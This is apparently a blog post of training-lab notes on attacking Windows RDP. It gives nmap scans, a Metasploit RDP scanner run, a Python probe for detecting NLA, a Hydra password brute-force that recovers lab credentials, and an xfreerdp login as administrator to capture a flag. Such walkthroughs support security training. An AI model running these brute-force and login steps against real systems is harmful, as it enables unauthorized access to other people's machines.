Exploiting RDP

Posted by r3kind1e on September 15, 2022

The Remote Desktop Protocol (RDP) is a proprietary GUI remote-access protocol developed by Microsoft, used to connect to and interact with Windows systems remotely.

RDP uses TCP port 3389 by default, but it can be configured to run on any other TCP port.

RDP authentication requires a legitimate user account on the target system together with that user's password in plaintext.

We can perform an RDP brute-force attack to identify legitimate user credentials, which we can then use to access the target system remotely.

Demo: Exploiting RDP

Target IP Address: 10.2.24.86

This particular port is not assigned to any known service. RDP can be configured to run on another port instead of the default port 3389.

nmap -sV -O 10.2.24.86
nmap -sV -p- 10.2.24.86
nmap -sV 10.2.24.86

How do you check a port and determine whether or not it is running RDP? One technique is to connect to the target system with an RDP client, specifying this particular port as the RDP port.

Another really helpful tool is the Metasploit RDP scanner module, which tells you whether the particular port is running RDP.

Identify endpoints speaking the Remote Desktop Protocol (RDP)

This module attempts to connect to the specified Remote Desktop Protocol port and determines whether it speaks RDP. If available, the Credential Security Support Provider (CredSSP) protocol is used to identify the version of Windows running the server. Enabling the DETECT_NLA option causes a second connection to be made to the server to determine whether Network Level Authentication (NLA) is required.

service postgresql start && msfconsole

search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 10.2.24.86
set RPORT 3333
run
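As an added example (not code from the original post or from the Metasploit module), here is a minimal Python probe that does on the wire what rdp_scanner does with DETECT_NLA: it sends an X.224 Connection Request carrying an RDP_NEG_REQ, first offering TLS and CredSSP to confirm the port speaks RDP, then offering TLS only, where an RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER means NLA is enforced. The sample replies at the bottom are constructed, not captured from the lab host; the same check is useful on the defending side to verify that every RDP listener, including ones moved to a non-default port like 3333, still requires NLA.

```python
import socket
import struct

# Protocol flags and negotiation codes from MS-RDPBCGR (RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE)
PROTOCOL_SSL, PROTOCOL_HYBRID = 0x1, 0x2           # TLS only / CredSSP (NLA)
TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x02, 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05                   # failureCode: server insists on NLA

def build_x224_connection_request(requested_protocols: int) -> bytes:
    """TPKT + X.224 CR-TPDU + RDP_NEG_REQ asking for the given protocols."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + neg_req   # CR, dst-ref, src-ref, class 0
    x224 = struct.pack("B", len(x224)) + x224              # LI = bytes after the LI byte
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224 # TPKT v3 header

def parse_x224_connection_confirm(data: bytes):
    """Return None unless `data` is an X.224 Connection Confirm; otherwise the
    RDP negotiation block as {"neg_type": 2|3|None, "value": int|None}."""
    if len(data) < 11 or data[0] != 0x03 or data[5] != 0xD0:
        return None
    body = data[11:5 + data[4]]                  # skip TPKT(4) + LI(1) + CC header(6)
    if len(body) < 8:                            # legacy server: no RDP_NEG_* block
        return {"neg_type": None, "value": None}
    neg_type, _flags, length, value = struct.unpack("<BBHI", body[:8])
    if length != 8 or neg_type not in (TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE):
        return None
    return {"neg_type": neg_type, "value": value}

def requires_nla(confirm: dict) -> bool:
    """True when a request WITHOUT CredSSP was refused with HYBRID_REQUIRED_BY_SERVER."""
    return confirm["neg_type"] == TYPE_RDP_NEG_FAILURE and confirm["value"] == HYBRID_REQUIRED_BY_SERVER

def probe(host: str, port: int, requested_protocols: int, timeout: float = 5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_x224_connection_request(requested_protocols))
        return parse_x224_connection_confirm(s.recv(1024))

def fingerprint(host: str, port: int) -> dict:
    """Two connections, as rdp_scanner does with DETECT_NLA: is this RDP, and is NLA mandatory?"""
    first = probe(host, port, PROTOCOL_SSL | PROTOCOL_HYBRID)
    if first is None:
        return {"rdp": False, "nla_required": None}
    second = probe(host, port, PROTOCOL_SSL)        # ask for TLS only, no CredSSP
    return {"rdp": True, "nla_required": second is not None and requires_nla(second)}

# Constructed sample replies (not captured from the lab host) for offline checking.
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")  # NEG_FAILURE, code 5
SAMPLE_HYBRID_OK = bytes.fromhex("030000130ed000001234000200080002000000")     # NEG_RSP, CredSSP chosen
SAMPLE_NOT_RDP = b"HTTP/1.1 400 Bad Request\r\n"
```

Calling fingerprint(host, 3333) against the lab target reproduces the module's "Requires NLA: Yes" verdict; a port that never answers with a Connection Confirm is reported as not RDP.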

However, we can't authenticate to the target system via RDP because we don't have any credentials, so the next step is to brute-force RDP.

Hydra

-s PORT: if the service is on a different default port, define it here

-t TASKS: run TASKS number of connects in parallel per target (default: 16)

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.2.24.86 -s 3333
xfreerdp [file] [options] [/v:<server>[:port]]

/option:<value> (specifies option with value)

/p:<password>                     Password

/u:[[<domain>\]<user>|<user>[@<domain>]]
                                      Username

/v:<server>[:port]                Server hostname

Examples:
    xfreerdp connection.rdp /p:Pwd123! /f
    xfreerdp /u:CONTOSO\JohnDoe /p:Pwd123! /v:rdp.contoso.com
    xfreerdp /u:JohnDoe /p:Pwd123! /w:1366 /h:768 /v:192.168.1.100:4489
    xfreerdp /u:JohnDoe /p:Pwd123! /vmconnect:C824F53E-95D2-46C6-9A18-23A5BB403532 /v:192.168.1.100
xfreerdp /u:administrator /p:qwertyuiop /v:10.2.24.86:3333

Windows: Insecure RDP Service

Overview

You are provided with a Kali GUI machine and a target machine running a vulnerable RDP service. The target machine's IP address is given in a text file named target on the Kali machine's desktop (/root/Desktop/target).

Your task is to fingerprint the running RDP service and its valid port using the tools available on the Kali machine, and then exploit the vulnerability using the appropriate method.

Note: rdesktop does not work for this setup because it does not support NLA. Please use xfreerdp to connect to the RDP server.

Objective: Exploit the application and retrieve the flag!

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to find the values of X and Y.
  • The target machine's IP address is given in the file "/root/Desktop/target".
  • Do not attack the gateways located at IP addresses 192.V.W.1 and 10.10.X.1.
  • Wordlists to use: /usr/share/metasploit-framework/data/wordlists/common_users.txt and /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

My own approach

Target IP Address : 10.0.16.124
root@attackdefense:~# nmap -sV 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:26 IST
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds

root@attackdefense:~# nmap -sV -p- -O 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:31 IST
Stats: 0:02:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
5985/tcp  open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
49178/tcp open  msrpc          Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=9/15%OT=135%CT=1%CU=34927%PV=Y%DS=3%DC=I%G=Y%TM=632296
OS:17%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=7F%CD=Z)

Network Distance: 3 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.93 seconds

Identify endpoints speaking the Remote Desktop Protocol (RDP)

root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
10.0.16.124
msf5 > use auxiliary/scanner/rdp/rdp_scanner
msf5 auxiliary(scanner/rdp/rdp_scanner) > show options

Module options (auxiliary/scanner/rdp/rdp_scanner):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DETECT_NLA       true             yes       Detect Network Level Authentication (NLA)
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3389             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rhosts 10.0.16.124
rhosts => 10.0.16.124
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rport 3333
rport => 3333
msf5 auxiliary(scanner/rdp/rdp_scanner) > run

[*] 10.0.16.124:3333      - Detected RDP on 10.0.16.124:3333      (Windows version: 6.3.9600) (Requires NLA: Yes)
[*] 10.0.16.124:3333      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.0.16.124 -s 3333 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-15 08:55:26
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking rdp://10.0.16.124:3333/
[3333][rdp] host: 10.0.16.124   login: sysadmin   password: samantha
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: demo   password: victoria
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: auditor   password: elizabeth
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: administrator   password: qwertyuiop
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-15 08:56:09

xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
root@attackdefense:~# xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
[09:04:26:668] [177980:177981] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.0.16.124:3333) 
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - Common Name (CN):
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - 	WIN-OMCNBKR66MN
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.0.16.124:3333 (RDP-Server):
	Common Name: WIN-OMCNBKR66MN
	Subject:     CN = WIN-OMCNBKR66MN
	Issuer:      CN = WIN-OMCNBKR66MN
	Thumbprint:  81:80:6a:ce:02:6f:0b:ca:67:da:6c:33:13:83:bf:b3:a6:53:a3:12
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y

We log in as Administrator and find flag.txt in C:\:

port-number-3333

Solution

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1957.pdf
